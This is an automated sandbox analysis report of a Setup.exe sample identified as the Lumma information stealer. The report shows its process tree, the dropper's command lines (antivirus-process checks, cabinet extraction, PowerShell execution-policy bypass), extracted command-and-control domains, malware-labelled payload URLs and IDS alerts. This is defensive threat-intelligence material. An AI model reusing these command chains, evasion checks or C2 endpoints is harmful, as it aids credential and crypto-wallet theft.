
Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1580131
MD5: 588eeb3d8f305fc008f034e10e0015c0
SHA1: 7a77ed807fbea72e7c94295343cf795e864adfae
SHA256: d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • Setup.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 588EEB3D8F305FC008F034E10E0015C0)
    • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7676 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7684 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7720 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7744 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7764 cmdline: cmd /c md 280366 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7780 cmdline: extrac32 /Y /E Agrees MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7804 cmdline: findstr /V "Travels" Served MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7820 cmdline: cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hc.com (PID: 7836 cmdline: Hc.com I MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 7312 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2836 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: 
center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f6c8140d9e27288</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- 
/#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7852 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hungrypaster.click", "tentabatte.lat", "curverpluch.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "hRjzG3--GAS"}
Source                                  | Rule                         | Description                  | Author
sslproxydump.pcap                       | JoeSecurity_LummaCStealer_3  | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap                       | JoeSecurity_LummaCStealer_2  | Yara detected LummaC Stealer | Joe Security

Source                                  | Rule                         | Description                  | Author
Process Memory Space: Hc.com PID: 7836  | JoeSecurity_LummaCStealer_3  | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Hc.com PID: 7836  | JoeSecurity_LummaCStealer    | Yara detected LummaC Stealer | Joe Security
decrypted.memstr                        | JoeSecurity_LummaCStealer_2  | Yara detected LummaC Stealer | Joe Security

System Summary

            Source: Process startedAuthor: Nikita Nazarov, oscd.community: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> 
<div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7744, ProcessName: findstr.exe
Timestamp                       | SID     | Severity | Classtype                                     | Source IP   | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T01:33:55.070414+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49742       | 188.114.97.6   | 443              | TCP
2024-12-24T01:33:57.315963+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49743       | 188.114.97.6   | 443              | TCP
2024-12-24T01:33:59.453447+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49744       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:01.741478+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49745       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:04.082295+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49746       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:06.375667+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49747       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:08.690904+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49748       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:10.828901+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49749       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:13.058213+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49750       | 172.67.169.205 | 443              | TCP
2024-12-24T01:34:18.115128+0100 | 2028371 | 3        | Unknown Traffic                               | 192.168.2.4 | 49751       | 104.21.84.113  | 443              | TCP
2024-12-24T01:33:56.093923+0100 | 2054653 | 1        | A Network Trojan was detected                 | 192.168.2.4 | 49742       | 188.114.97.6   | 443              | TCP
2024-12-24T01:33:58.076932+0100 | 2054653 | 1        | A Network Trojan was detected                 | 192.168.2.4 | 49743       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:11.616553+0100 | 2054653 | 1        | A Network Trojan was detected                 | 192.168.2.4 | 49749       | 188.114.97.6   | 443              | TCP
2024-12-24T01:33:56.093923+0100 | 2049836 | 1        | A Network Trojan was detected                 | 192.168.2.4 | 49742       | 188.114.97.6   | 443              | TCP
2024-12-24T01:33:58.076932+0100 | 2049812 | 1        | A Network Trojan was detected                 | 192.168.2.4 | 49743       | 188.114.97.6   | 443              | TCP
2024-12-24T01:34:09.604944+0100 | 2048094 | 1        | Malware Command and Control Activity Detected | 192.168.2.4 | 49748       | 188.114.97.6   | 443              | TCP

AV Detection

Source: https://kliptizq.shop:443/int_clp_ldr_sha.txt; Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/(W#; Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/; Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txt; Avira URL Cloud: Label: malware
Source: https://neqi.shop/; Avira URL Cloud: Label: malware
Source: https://neqi.shop:443/sdgjyut/psh.txt; Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txto; Avira URL Cloud: Label: malware
Source: https://neqi.shop/BJ; Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txtk; Avira URL Cloud: Label: malware
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: LummaC {"C2 url": ["hungrypaster.click", "tentabatte.lat", "curverpluch.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "hRjzG3--GAS"}
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: bashfulacid.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: tentabatte.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: curverpluch.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: talkynicer.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: shapestickyr.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: manyrestro.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: slipperyloo.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: wordyfindy.lat
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: hungrypaster.click
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: - Screen Resoluton:
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: - Physical Installed Memory:
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: Workgroup: -
Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: hRjzG3--GAS
Source: Setup.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: Setup.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb; source: powershell.exe, 00000010.00000002.2341213621.0000000007879000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Setup.exe; Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe; Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CDC54
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA087
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA1E2
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_002CE472
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_002DA570
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_0029C622 FindFirstFileExW,11_2_0029C622
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002D66DC FindFirstFileW,FindNextFileW,FindClose,11_2_002D66DC
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002D7333 FindFirstFileW,FindClose,11_2_002D7333
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002D73D4
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 11_2_002CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CD921
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\280366
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\280366\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\

Networking

Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49743 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.97.6:443
Source: Malware configuration extractor; URLs: hungrypaster.click
Source: Malware configuration extractor; URLs: tentabatte.lat
Source: Malware configuration extractor; URLs: curverpluch.lat
Source: Malware configuration extractor; URLs: wordyfindy.lat
Source: Malware configuration extractor; URLs: bashfulacid.lat
Source: Malware configuration extractor; URLs: slipperyloo.lat
Source: Malware configuration extractor; URLs: talkynicer.lat
Source: Malware configuration extractor; URLs: manyrestro.lat
Source: Malware configuration extractor; URLs: shapestickyr.lat
Source: Joe Sandbox View; IP Address: 188.114.97.6
Source: Joe Sandbox View; IP Address: 188.114.97.6
Source: Joe Sandbox View; IP Address: 104.21.84.113
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.84.113:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.6:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.169.205:443
